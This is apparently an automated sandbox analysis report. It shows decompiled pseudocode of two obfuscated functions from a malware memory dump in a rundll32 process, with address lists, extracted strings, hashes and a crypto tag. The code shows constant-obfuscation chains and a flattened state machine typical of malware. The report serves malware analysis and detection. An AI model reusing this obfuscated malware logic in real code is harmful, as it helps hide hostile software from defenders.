				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				void* _t480;
				signed int* _t482;

				_push(_a24);
				_t480 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F56B2(_t372);
				_v1640 = _v1640 & 0x00000000;
				_t482 =  &(( &_v1800)[8]);
				_v1644 = 0x4bd480;
				_v1780 = 0x9933;
				_t416 = 0x363f5361;
				_v1780 = _v1780 | 0xad73ff37;
				_v1780 = _v1780 ^ 0x960b9a74;
				_v1780 = _v1780 ^ 0x3b786553;
				_v1784 = 0x542f;
				_v1784 = _v1784 + 0xc8ce;
				_v1784 = _v1784 + 0xffffa8c2;
				_t468 = 0x5b;
				_v1784 = _v1784 / _t468;
				_v1784 = _v1784 ^ 0x00004f1f;
				_v1760 = 0xa937;
				_v1760 = _v1760 + 0xc6be;
				_v1760 = _v1760 | 0x9e8a2caa;
				_v1760 = _v1760 + 0xffff9fa2;
				_v1760 = _v1760 ^ 0x9e8b35b0;
				_v1792 = 0xa290;
				_t470 = 0x63;
				_v1792 = _v1792 * 0x38;
				_v1792 = _v1792 + 0xffff655b;
				_v1792 = _v1792 + 0xffff3f9a;
				_v1792 = _v1792 ^ 0x00223804;
				_v1740 = 0x49e2;
				_v1740 = _v1740 >> 8;
				_v1740 = _v1740 | 0xc414d990;
				_v1740 = _v1740 ^ 0xc41493fb;
				_v1800 = 0x74d9;
				_t471 = 0x17;
				_v1800 = _v1800 / _t470;
				_v1800 = _v1800 ^ 0xc291bda4;
				_v1800 = _v1800 + 0xeb6d;
				_v1800 = _v1800 ^ 0xc292eb29;
				_v1720 = 0x4d0b;
				_v1720 = _v1720 << 7;
				_v1720 = _v1720 + 0x277b;
				_v1720 = _v1720 ^ 0x00268d74;
				_v1768 = 0x75cf;
				_v1768 = _v1768 * 0x62;
				_v1768 = _v1768 + 0x1332;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 ^ 0x00000ed4;
				_v1692 = 0xd85d;
				_v1692 = _v1692 + 0xd2aa;
				_v1692 = _v1692 ^ 0x0001f663;
				_v1788 = 0xbc3e;
				_v1788 = _v1788 | 0x282d42cc;
				_v1788 = _v1788 + 0xffffb4b2;
				_v1788 = _v1788 * 0x25;
				_v1788 = _v1788 ^ 0xce9a942b;
				_v1796 = 0x301;
				_v1796 = _v1796 ^ 0x0ec358c8;
				_v1796 = _v1796 / _t471;
				_v1796 = _v1796 + 0xffff6806;
				_v1796 = _v1796 ^ 0x00a3cb1c;
				_v1656 = 0xf49e;
				_v1656 = _v1656 + 0xffffddef;
				_v1656 = _v1656 ^ 0x0000aa95;
				_v1728 = 0xf403;
				_v1728 = _v1728 + 0x6a8e;
				_v1728 = _v1728 << 6;
				_v1728 = _v1728 ^ 0x0057d552;
				_v1756 = 0x4f4e;
				_v1756 = _v1756 + 0xffff0830;
				_v1756 = _v1756 | 0xfc8d1ff5;
				_v1756 = _v1756 >> 0xb;
				_v1756 = _v1756 ^ 0x001fca39;
				_v1680 = 0x60;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0x00002a5b;
				_v1688 = 0xc18a;
				_v1688 = _v1688 ^ 0xc8271709;
				_v1688 = _v1688 ^ 0xc827be32;
				_v1704 = 0xf8b0;
				_v1704 = _v1704 << 6;
				_v1704 = _v1704 ^ 0x003e063b;
				_v1772 = 0x7a1e;
				_v1772 = _v1772 ^ 0xc6946529;
				_v1772 = _v1772 << 4;
				_v1772 = _v1772 << 2;
				_v1772 = _v1772 ^ 0xa507b562;
				_v1744 = 0xe662;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 | 0x81d50607;
				_v1744 = _v1744 ^ 0x81d55403;
				_v1716 = 0x2f94;
				_v1716 = _v1716 / _t468;
				_t472 = 0x2c;
				_v1716 = _v1716 / _t472;
				_v1716 = _v1716 ^ 0x00000a71;
				_v1648 = 0xc69;
				_v1648 = _v1648 + 0x3b27;
				_v1648 = _v1648 ^ 0x00004de4;
				_v1732 = 0x30eb;
				_v1732 = _v1732 | 0x980f1189;
				_t473 = 0x7e;
				_v1732 = _v1732 * 0x3d;
				_v1732 = _v1732 ^ 0x3b9ecce7;
				_v1684 = 0xb64c;
				_v1684 = _v1684 ^ 0x315bc1c3;
				_v1684 = _v1684 ^ 0x315b57c4;
				_v1724 = 0x6411;
				_v1724 = _v1724 | 0xfbcd3fff;
				_v1724 = _v1724 ^ 0xfbcd5420;
				_v1764 = 0xfef7;
				_v1764 = _v1764 >> 0xf;
				_v1764 = _v1764 ^ 0xb299bfc4;
				_v1764 = _v1764 | 0x06f7c44b;
				_v1764 = _v1764 ^ 0xb6ffeafa;
				_v1676 = 0x7f53;
				_v1676 = _v1676 ^ 0x68612cf3;
				_v1676 = _v1676 ^ 0x68615bca;
				_v1736 = 0xced2;
				_v1736 = _v1736 / _t473;
				_t474 = 0x45;
				_v1736 = _v1736 / _t474;
				_v1736 = _v1736 ^ 0x00002bb2;
				_v1748 = 0xc83d;
				_v1748 = _v1748 | 0xac12259f;
				_v1748 = _v1748 + 0xffff4283;
				_v1748 = _v1748 ^ 0xac12199f;
				_v1696 = 0xff80;
				_t475 = 0x51;
				_v1696 = _v1696 / _t475;
				_v1696 = _v1696 ^ 0x0000122c;
				_v1700 = 0x5074;
				_v1700 = _v1700 + 0xffffb5cd;
				_v1700 = _v1700 ^ 0x0000626a;
				_v1668 = 0xce62;
				_t476 = 0x5d;
				_v1668 = _v1668 / _t476;
				_v1668 = _v1668 ^ 0x00006436;
				_v1652 = 0x16bc;
				_v1652 = _v1652 << 3;
				_v1652 = _v1652 ^ 0x0000d776;
				_v1664 = 0x5160;
				_v1664 = _v1664 + 0xffff7d7f;
				_v1664 = _v1664 ^ 0xfffff234;
				_v1776 = 0x2bb0;
				_v1776 = _v1776 ^ 0xda170107;
				_v1776 = _v1776 >> 9;
				_v1776 = _v1776 >> 0xa;
				_v1776 = _v1776 ^ 0x00006842;
				_v1660 = 0xed5a;
				_t477 = 0x4f;
				_v1660 = _v1660 / _t477;
				_v1660 = _v1660 ^ 0x00003872;
				_v1708 = 0x88f4;
				_v1708 = _v1708 + 0x1364;
				_v1708 = _v1708 ^ 0x00009651;
				_v1712 = 0x6359;
				_v1712 = _v1712 ^ 0x0adc469b;
				_t469 = _v1708;
				_v1712 = _v1712 * 0x12;
				_v1712 = _v1712 ^ 0xc37acb18;
				_v1672 = 0x7869;
				_v1672 = _v1672 * 0x31;
				_v1672 = _v1672 ^ 0x001774dc;
				_v1752 = 0x2ad2;
				_v1752 = _v1752 + 0x99c0;
				_v1752 = _v1752 + 0xffff4378;
				_v1752 = _v1752 ^ 0x00000634;
				while(1) {
					_t457 = 0x2e;
					L2:
					while(_t416 != 0x34b2b71) {
						if(_t416 == 0x5071dc9) {
							__eflags = _v1636 & _v1780;
							if(__eflags == 0) {
								_t403 = _a16( &_v1636, _a12);
								asm("sbb ecx, ecx");
								_t420 =  ~_t403 & 0x01e56524;
								L9:
								_t416 = _t420 + 0x36fd2c93;
								while(1) {
									_t457 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1592 - _t457;
							if(_v1592 != _t457) {
								L18:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(0x1f15c0);
									_push(_v1744);
									_t410 = E0020BF25(_v1704, _v1772, __eflags);
									_pop(_t423);
									E002063BF(_t410, __eflags, _v1648, _v1732,  &_v524, _t423, _v1684, _t480,  &_v1592, _v1724);
									E001F4EA1( &_v524, _v1764, _v1676, _v1736, _a12, _a16, _v1748, _a24);
									_t407 = E0020C5F7(_v1696, _v1700, _v1668, _v1652, _t410);
									_t482 =  &(_t482[0x11]);
									_t457 = 0x2e;
								}
								L17:
								_t416 = 0x38e291b7;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v1590 - _t457;
							if(_v1590 != _t457) {
								goto L18;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t416 == 0x14043b9b) {
							_push(0x1f15b0);
							_push(_v1792);
							_t404 = E0020BF25(_v1784, _v1760, __eflags);
							_pop(_t429);
							E00203D3D(_t404, __eflags, _v1740, _v1800,  &_v1044, _v1720, _t429, _v1768);
							_t407 = E0020C5F7(_v1692, _v1788, _v1796, _v1656, _t404);
							_t482 =  &(_t482[9]);
							_t416 = 0x34b2b71;
							while(1) {
								_t457 = 0x2e;
								goto L2;
							}
						}
						if(_t416 == 0x363f5361) {
							_t416 = 0x14043b9b;
							continue;
						}
						if(_t416 == 0x36fd2c93) {
							return E001F1EC9(_v1708, _v1712, _t469, _v1672, _v1752);
						}
						if(_t416 != 0x38e291b7) {
							L24:
							__eflags = _t416 - 0x1d1ded50;
							if(__eflags != 0) {
								continue;
							}
							return _t407;
						}
						_t407 = E0020D0A1(_v1664, _t469, _v1776, _v1660,  &_v1636);
						_t482 =  &(_t482[3]);
						asm("sbb ecx, ecx");
						_t420 =  ~_t407 & 0xce09f136;
						goto L9;
					}
					_t400 = E001F2577( &_v1044,  &_v1636, _v1728, _v1756, _v1680, _v1688);
					_t469 = _t400;
					_t482 =  &(_t482[4]);
					__eflags = _t400 - 0xffffffff;
					if(__eflags == 0) {
						_t416 = 0x1d1ded50;
						_t457 = 0x2e;
						goto L24;
					}
					_t416 = 0x5071dc9;
				}
			}

0x001f4eaa
0x001f4eb1
0x001f4eb3
0x001f4eba
0x001f4ec1
0x001f4ec8
0x001f4ecf
0x001f4ed6
0x001f4ed7
0x001f4ed8
0x001f4edd
0x001f4ee5
0x001f4ee8
0x001f4ef5
0x001f4efd
0x001f4f02
0x001f4f0a
0x001f4f12
0x001f4f1a
0x001f4f22
0x001f4f2a
0x001f4f38
0x001f4f3d
0x001f4f43
0x001f4f4b
0x001f4f53
0x001f4f5b
0x001f4f63
0x001f4f6b
0x001f4f73
0x001f4f80
0x001f4f83
0x001f4f87
0x001f4f8f
0x001f4f97
0x001f4f9f
0x001f4fa7
0x001f4fac
0x001f4fb4
0x001f4fbc
0x001f4fca
0x001f4fcb
0x001f4fcf
0x001f4fd7
0x001f4fdf
0x001f4fe7
0x001f4fef
0x001f4ff4
0x001f4ffc
0x001f5004
0x001f5011
0x001f5015
0x001f501d
0x001f5022
0x001f502a
0x001f5032
0x001f503a
0x001f5042
0x001f504a
0x001f5052
0x001f505f
0x001f5063
0x001f506b
0x001f5073
0x001f5085
0x001f5089
0x001f5091
0x001f5099
0x001f50a4
0x001f50af
0x001f50ba
0x001f50c2
0x001f50ca
0x001f50cf
0x001f50d7
0x001f50df
0x001f50e7
0x001f50ef
0x001f50f4
0x001f50fc
0x001f5107
0x001f510f
0x001f511a
0x001f5122
0x001f512a
0x001f5132
0x001f513a
0x001f513f
0x001f5147
0x001f514f
0x001f5157
0x001f515c
0x001f5161
0x001f5169
0x001f5171
0x001f5176
0x001f517e
0x001f5186
0x001f5196
0x001f51a0
0x001f51a5
0x001f51ab
0x001f51b3
0x001f51be
0x001f51c9
0x001f51d4
0x001f51dc
0x001f51e9
0x001f51ec
0x001f51f0
0x001f51f8
0x001f5203
0x001f520e
0x001f5219
0x001f5221
0x001f5229
0x001f5231
0x001f5239
0x001f523e
0x001f5246
0x001f524e
0x001f5256
0x001f5261
0x001f526c
0x001f5277
0x001f5287
0x001f528f
0x001f5292
0x001f5296
0x001f52a0
0x001f52a8
0x001f52b0
0x001f52b8
0x001f52c0
0x001f52ce
0x001f52d3
0x001f52d9
0x001f52e1
0x001f52e9
0x001f52f1
0x001f52f9
0x001f530b
0x001f5310
0x001f5319
0x001f5324
0x001f532f
0x001f5337
0x001f5342
0x001f534d
0x001f5358
0x001f5363
0x001f536b
0x001f5373
0x001f5378
0x001f537d
0x001f5385
0x001f5397
0x001f539a
0x001f53a1
0x001f53ac
0x001f53b4
0x001f53bc
0x001f53c4
0x001f53cc
0x001f53d9
0x001f53dd
0x001f53e1
0x001f53e9
0x001f53fc
0x001f5403
0x001f540e
0x001f5416
0x001f541e
0x001f5426
0x001f542e
0x001f5430
0x00000000
0x001f5431
0x001f5443
0x001f5519
0x001f5520
0x001f5624
0x001f562f
0x001f5631
0x001f54a1
0x001f54a1
0x001f542e
0x001f5430
0x00000000
0x001f5430
0x001f542e
0x001f5526
0x001f552e
0x001f555a
0x001f555a
0x001f5562
0x001f5564
0x001f5569
0x001f5575
0x001f557b
0x001f55af
0x001f55e3
0x001f5605
0x001f560a
0x001f560f
0x001f560f
0x001f5550
0x001f5550
0x00000000
0x001f5550
0x001f5530
0x001f5539
0x00000000
0x00000000
0x001f553b
0x001f5543
0x00000000
0x00000000
0x001f5545
0x001f554e
0x00000000
0x00000000
0x00000000
0x001f554e
0x001f544f
0x001f54b0
0x001f54b5
0x001f54c1
0x001f54c7
0x001f54e7
0x001f5503
0x001f5508
0x001f550b
0x001f542e
0x001f5430
0x00000000
0x001f5430
0x001f542e
0x001f5457
0x001f54a9
0x00000000
0x001f54a9
0x001f545f
0x00000000
0x001f56a5
0x001f546b
0x001f567e
0x001f567e
0x001f5684
0x00000000
0x00000000
0x00000000
0x001f5684
0x001f548d
0x001f5492
0x001f5499
0x001f549b
0x00000000
0x001f549b
0x001f565d
0x001f5662
0x001f5664
0x001f5667
0x001f566a
0x001f5678
0x001f567d
0x00000000
0x001f567d
0x001f566c
0x001f566c

Strings

Yc, xrefs: 001F53C4
Z, xrefs: 001F5385
m, xrefs: 001F4FD7
6d, xrefs: 001F5319
aS?6, xrefs: 001F5451
[*, xrefs: 001F510F
b, xrefs: 001F5169
I, xrefs: 001F4F9F
M, xrefs: 001F51C9
Sex;, xrefs: 001F4F12
Bh, xrefs: 001F537D
ix, xrefs: 001F53E9
jb, xrefs: 001F52F1
aS?6, xrefs: 001F4EFD
{', xrefs: 001F4FF4
/T, xrefs: 001F4F1A
r8, xrefs: 001F53A1
0, xrefs: 001F51D4
NO, xrefs: 001F50D7

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: /T$6d$Bh$NO$Sex;$Yc$Z$[*$aS?6$aS?6$b$ix$jb$m$r8${'$0$I$M
API String ID: 0-4291825950
Opcode ID: 41f227536151cc90315e31f476658d05c2e02d57f04fa36b0a1d379d69fa593f
Instruction ID: f657fa9d75c4a3b4e1f4a0baf8203475c9421cb659b78e6e21e4daf81f36c3a6
Opcode Fuzzy Hash: 41f227536151cc90315e31f476658d05c2e02d57f04fa36b0a1d379d69fa593f
Instruction Fuzzy Hash: D21213715087819FE368CF25C54A65FBBE2FBC4358F10891DE2D9862A0D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020E19F, Relevance: 21.7, Strings: 17, Instructions: 470
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0020E19F(void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				unsigned int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* __ecx;
				void* _t451;
				void* _t486;
				signed int _t488;
				intOrPtr _t496;
				void* _t501;
				signed int _t511;
				signed int _t515;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				void* _t535;
				intOrPtr _t573;
				void* _t575;
				signed int* _t587;
				void* _t590;

				_t516 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001F56B2(_t451);
				_v16 = 0x624f91;
				_t587 =  &(( &_v220)[4]);
				_v12 = 0x2a04c0;
				_v8 = 0x512f64;
				_t573 = 0;
				_v4 = 0;
				_t575 = 0x21d5185e;
				_v216 = 0xc140;
				_t518 = 0xe;
				_v216 = _v216 / _t518;
				_v216 = _v216 | 0xdbfffb91;
				_v216 = _v216 ^ 0xdbff99d3;
				_v168 = 0x2a5e;
				_v168 = _v168 ^ 0xa3c44280;
				_v168 = _v168 << 9;
				_t519 = 0x26;
				_v168 = _v168 / _t519;
				_v168 = _v168 ^ 0x03993ad3;
				_v192 = 0x18c2;
				_v192 = _v192 ^ 0xd0e63b27;
				_v192 = _v192 ^ 0xef30ec67;
				_t36 =  &_v192; // 0xef30ec67
				_t520 = 0x16;
				_v192 =  *_t36 / _t520;
				_v192 = _v192 ^ 0x02e65ae3;
				_v28 = 0x8b75;
				_t521 = 0x66;
				_v28 = _v28 / _t521;
				_v28 = _v28 ^ 0x0000015f;
				_v116 = 0x1a67;
				_v116 = _v116 ^ 0x4b480ab8;
				_v116 = _v116 + 0xffffe6d8;
				_v116 = _v116 ^ 0x4b47f7f7;
				_v164 = 0xf9a1;
				_v164 = _v164 + 0xce44;
				_t522 = 0x15;
				_v164 = _v164 / _t522;
				_v164 = _v164 * 0x64;
				_v164 = _v164 ^ 0xf0087ab4;
				_v104 = 0x8783;
				_v104 = _v104 >> 9;
				_v104 = _v104 << 7;
				_v104 = _v104 ^ 0x000005ac;
				_v68 = 0xc586;
				_v68 = _v68 * 0x2a;
				_v68 = _v68 ^ 0x00202599;
				_v40 = 0xd110;
				_v40 = _v40 | 0x671d2d67;
				_v40 = _v40 ^ 0x671d8efb;
				_v100 = 0x326d;
				_v100 = _v100 ^ 0xf0f4e5fa;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x3d35bfd9;
				_v48 = 0x7d57;
				_t523 = 0x63;
				_v48 = _v48 * 0x6e;
				_v48 = _v48 ^ 0x0035e190;
				_v156 = 0xbe8d;
				_v156 = _v156 | 0xda6f2624;
				_v156 = _v156 + 0xdae9;
				_v156 = _v156 | 0xe9accc97;
				_v156 = _v156 ^ 0xfbfc818b;
				_v108 = 0xbce1;
				_v108 = _v108 ^ 0x7ee51402;
				_v108 = _v108 + 0xffff7bea;
				_v108 = _v108 ^ 0x7ee5758f;
				_v56 = 0x8521;
				_v56 = _v56 ^ 0x357a7630;
				_v56 = _v56 ^ 0x357a8a2f;
				_v124 = 0x158;
				_v124 = _v124 + 0xffffb1a8;
				_v124 = _v124 | 0x92d6cfda;
				_v124 = _v124 ^ 0xffffc67a;
				_v172 = 0xab3b;
				_v172 = _v172 | 0xe0b1ec5b;
				_v172 = _v172 ^ 0xbad91e0a;
				_v172 = _v172 + 0xa707;
				_v172 = _v172 ^ 0x5a69f167;
				_v96 = 0xed9e;
				_v96 = _v96 + 0x6931;
				_v96 = _v96 ^ 0x00013b1d;
				_v208 = 0xc215;
				_v208 = _v208 + 0xb2e7;
				_v208 = _v208 ^ 0x39f9ff48;
				_v208 = _v208 + 0x9ab9;
				_v208 = _v208 ^ 0x39f93b82;
				_v112 = 0x3498;
				_v112 = _v112 + 0x4bc6;
				_v112 = _v112 / _t523;
				_v112 = _v112 ^ 0x00004366;
				_v220 = 0x48;
				_v220 = _v220 | 0xadbd3685;
				_t524 = 0x25;
				_v220 = _v220 / _t524;
				_v220 = _v220 + 0xbcbb;
				_v220 = _v220 ^ 0x04b294b8;
				_v160 = 0x4d28;
				_v160 = _v160 >> 3;
				_t525 = 0x58;
				_v160 = _v160 * 0xb;
				_v160 = _v160 / _t525;
				_v160 = _v160 ^ 0x00006f26;
				_v60 = 0xbd2;
				_v60 = _v60 + 0xffff7eef;
				_v60 = _v60 ^ 0xffffcc99;
				_v32 = 0x1812;
				_v32 = _v32 + 0xffff0573;
				_v32 = _v32 ^ 0xffff5502;
				_v132 = 0x7f72;
				_t526 = 0x75;
				_v132 = _v132 / _t526;
				_v132 = _v132 + 0xb09c;
				_v132 = _v132 ^ 0x000095d1;
				_v188 = 0x9149;
				_v188 = _v188 | 0xa4dde4e7;
				_v188 = _v188 + 0x1385;
				_v188 = _v188 << 0xe;
				_v188 = _v188 ^ 0x825d3d05;
				_v152 = 0x592e;
				_t527 = 0x28;
				_v152 = _v152 * 0x2c;
				_v152 = _v152 ^ 0x9c2a3110;
				_v152 = _v152 ^ 0x9c255458;
				_v196 = 0x1135;
				_v196 = _v196 + 0xfffff425;
				_v196 = _v196 >> 6;
				_v196 = _v196 ^ 0xbfbf1d5b;
				_v196 = _v196 ^ 0xbfbf60c8;
				_v204 = 0xcc36;
				_v204 = _v204 * 0xe;
				_v204 = _v204 >> 1;
				_v204 = _v204 << 0xa;
				_v204 = _v204 ^ 0x1655baac;
				_v212 = 0xe9d4;
				_v212 = _v212 + 0xffff7206;
				_v212 = _v212 + 0x7a90;
				_v212 = _v212 ^ 0x86b4db23;
				_v212 = _v212 ^ 0x86b43879;
				_v180 = 0xccf3;
				_v180 = _v180 ^ 0xb9c8351b;
				_v180 = _v180 | 0x98038e8f;
				_v180 = _v180 * 0x49;
				_v180 = _v180 ^ 0xfb2bf902;
				_v64 = 0x9efe;
				_v64 = _v64 + 0xfffffaef;
				_v64 = _v64 ^ 0x0000b4c9;
				_v72 = 0xd172;
				_v72 = _v72 | 0x8d5131d7;
				_v72 = _v72 ^ 0x8d51ace7;
				_v120 = 0x59d5;
				_v120 = _v120 + 0xffffff6e;
				_v120 = _v120 >> 6;
				_v120 = _v120 ^ 0x00005703;
				_v84 = 0xde85;
				_v84 = _v84 ^ 0x89f562d5;
				_v84 = _v84 ^ 0x89f58b7f;
				_v52 = 0x311b;
				_v52 = _v52 << 1;
				_v52 = _v52 ^ 0x00002d97;
				_v184 = 0xdffe;
				_v184 = _v184 ^ 0xc31def80;
				_v184 = _v184 << 1;
				_v184 = _v184 * 0xe;
				_v184 = _v184 ^ 0x573173b9;
				_v144 = 0x2421;
				_v144 = _v144 * 0x7e;
				_v144 = _v144 + 0xffffbdf8;
				_v144 = _v144 ^ 0x0011d9fd;
				_v140 = 0xb5be;
				_v140 = _v140 + 0xffff1138;
				_v140 = _v140 ^ 0xaa88dcf7;
				_v140 = _v140 ^ 0x55773d43;
				_v44 = 0x6427;
				_v44 = _v44 ^ 0x73b6b443;
				_v44 = _v44 ^ 0x73b6c2cf;
				_v76 = 0xab83;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x00003dd9;
				_v176 = 0xa297;
				_v176 = _v176 + 0x40d1;
				_v176 = _v176 / _t527;
				_v176 = _v176 >> 0xb;
				_v176 = _v176 ^ 0x0000189d;
				_v136 = 0x856e;
				_v136 = _v136 << 0xf;
				_v136 = _v136 >> 0x10;
				_v136 = _v136 ^ 0x00004166;
				_v200 = 0x9381;
				_v200 = _v200 << 5;
				_v200 = _v200 + 0xcf90;
				_t528 = 0x3c;
				_v200 = _v200 / _t528;
				_v200 = _v200 ^ 0x000016ff;
				_v80 = 0x8f73;
				_v80 = _v80 + 0xffffab60;
				_v80 = _v80 ^ 0x00004f6d;
				_v88 = 0xa0c7;
				_v88 = _v88 ^ 0xf6585f6c;
				_v88 = _v88 ^ 0xf658d2ca;
				_v148 = 0x53c;
				_v148 = _v148 << 9;
				_v148 = _v148 << 0x10;
				_v148 = _v148 ^ 0x7800710d;
				_v36 = 0x1d9;
				_v36 = _v36 + 0x3c9e;
				_v36 = _v36 ^ 0x00013e77;
				_v92 = 0x5eee;
				_v92 = _v92 + 0xffffe50b;
				_v92 = _v92 ^ 0x000043ea;
				_v128 = 0xff6;
				_v128 = _v128 >> 0xd;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x00000001;
				goto L1;
				do {
					while(1) {
						L1:
						_t590 = _t575 - 0x21d5185e;
						if(_t590 > 0) {
							break;
						}
						if(_t590 == 0) {
							_t535 = 0x2c;
							_t496 = E002057E8(_t535);
							 *0x2121b4 = _t496;
							_t528 = _t528;
							if(_t496 != 0) {
								_t575 = 0x235d3418;
								continue;
							}
						} else {
							if(_t575 == 0x1d010d0) {
								_t528 = _v44;
								_t501 = E001F8F73(_t528, _v76,  *((intOrPtr*)( *0x2121b4 + 4)), _t528, _v176, _v136, _t528, _v200, _v168,  *0x2121b4 + 0x10);
								_t587 =  &(_t587[8]);
								if(_t501 != 0) {
									_t573 = 1;
								} else {
									_t575 = 0x2ad17601;
									continue;
								}
							} else {
								if(_t575 == 0x2a7485f) {
									_push(_t528);
									E001F8A8C( *((intOrPtr*)( *0x2121b4 + 4)));
									_t528 = _t528;
									_t575 = 0xea2ab84;
									continue;
								} else {
									if(_t575 == 0x6da30e1) {
										_push(_t528);
										E001FAC80( *((intOrPtr*)( *0x2121b4 + 0x14)));
										_t528 = _t528;
										_t575 = 0x2a7485f;
										continue;
									} else {
										if(_t575 == 0xea2ab84) {
											E001F91CD(_v40, _v100, _v48,  *0x2121b4, _v156);
										} else {
											if(_t575 != 0x16122494) {
												goto L25;
											} else {
												_push(_t528);
												_t528 = _v184;
												_t511 = E001FAB96(_t528, _v144, _v216, _v140, _v28,  *((intOrPtr*)( *0x2121b4 + 4)));
												_t587 =  &(_t587[5]);
												asm("sbb esi, esi");
												_t575 = ( ~_t511 & 0xfaf5dfef) + 0x6da30e1;
												continue;
											}
										}
									}
								}
							}
						}
						L29:
						return _t573;
					}
					if(_t575 == 0x235d3418) {
						_push(_t528);
						_t528 = _v164 | _v116;
						_t486 = E001F3BCD(_t528, _v108, _v56, _v124, _t528, _v172, _t528,  *0x2121b4 + 4);
						_t587 =  &(_t587[7]);
						if(_t486 == 0) {
							_t575 = 0xea2ab84;
							goto L25;
						} else {
							_t575 = 0x2b13f55e;
							goto L1;
						}
					} else {
						if(_t575 == 0x261556b7) {
							_t488 = E001F7A59(_v132, _v188, _v24,  *0x2121b4, _v20,  *((intOrPtr*)( *0x2121b4 + 4)),  *0x2121b4 + 0x14, _v152, _v196, _t528, _v204, _v212);
							_t528 = _v180;
							asm("sbb esi, esi");
							_t575 = ( ~_t488 & 0x136adc35) + 0x2a7485f;
							E001F7BE0(_t528, _v24, _v64, _v72);
							_t587 =  &(_t587[0xc]);
							goto L25;
						} else {
							if(_t575 == 0x2ad17601) {
								_push(_t528);
								E001FAC80( *((intOrPtr*)( *0x2121b4)));
								_t528 = _t528;
								_t575 = 0x6da30e1;
								goto L1;
							} else {
								if(_t575 != 0x2b13f55e) {
									goto L25;
								} else {
									_push(_t528);
									_t528 =  &_v20;
									_t515 = E001FCC2A(_t528, _v92,  *_t516, _v112, _v220, _v160, _v128 | _v36,  &_v24, _v60,  *((intOrPtr*)(_t516 + 4)), _v32, _v192);
									_t587 =  &(_t587[0xb]);
									asm("sbb esi, esi");
									_t575 = ( ~_t515 & 0x236e0e58) + 0x2a7485f;
									goto L1;
								}
							}
						}
					}
					goto L29;
					L25:
				} while (_t575 != 0x1e355eb8);
				goto L29;
			}

0x0020e1a6
0x0020e1b0
0x0020e1b1
0x0020e1b8
0x0020e1ba
0x0020e1bf
0x0020e1ca
0x0020e1cd
0x0020e1da
0x0020e1e5
0x0020e1e7
0x0020e1ee
0x0020e1f3
0x0020e201
0x0020e206
0x0020e20c
0x0020e214
0x0020e21c
0x0020e224
0x0020e22c
0x0020e235
0x0020e23a
0x0020e240
0x0020e248
0x0020e250
0x0020e258
0x0020e260
0x0020e264
0x0020e269
0x0020e26f
0x0020e277
0x0020e289
0x0020e28e
0x0020e297
0x0020e2a2
0x0020e2aa
0x0020e2b2
0x0020e2ba
0x0020e2c2
0x0020e2ca
0x0020e2d6
0x0020e2d9
0x0020e2e2
0x0020e2e6
0x0020e2ee
0x0020e2f9
0x0020e301
0x0020e309
0x0020e314
0x0020e327
0x0020e32e
0x0020e339
0x0020e344
0x0020e34f
0x0020e35a
0x0020e365
0x0020e372
0x0020e37a
0x0020e385
0x0020e39a
0x0020e39d
0x0020e3a4
0x0020e3af
0x0020e3b7
0x0020e3bf
0x0020e3c7
0x0020e3cf
0x0020e3d7
0x0020e3e2
0x0020e3ed
0x0020e3f8
0x0020e403
0x0020e40e
0x0020e419
0x0020e424
0x0020e42c
0x0020e434
0x0020e43c
0x0020e444
0x0020e44c
0x0020e454
0x0020e45c
0x0020e464
0x0020e46c
0x0020e477
0x0020e482
0x0020e48d
0x0020e495
0x0020e49d
0x0020e4a5
0x0020e4ad
0x0020e4b5
0x0020e4c0
0x0020e4d6
0x0020e4dd
0x0020e4e8
0x0020e4f0
0x0020e4fc
0x0020e501
0x0020e507
0x0020e50f
0x0020e517
0x0020e51f
0x0020e529
0x0020e52c
0x0020e538
0x0020e53c
0x0020e544
0x0020e54f
0x0020e55a
0x0020e565
0x0020e570
0x0020e57b
0x0020e586
0x0020e592
0x0020e595
0x0020e599
0x0020e5a1
0x0020e5a9
0x0020e5b3
0x0020e5bb
0x0020e5c3
0x0020e5c8
0x0020e5d0
0x0020e5df
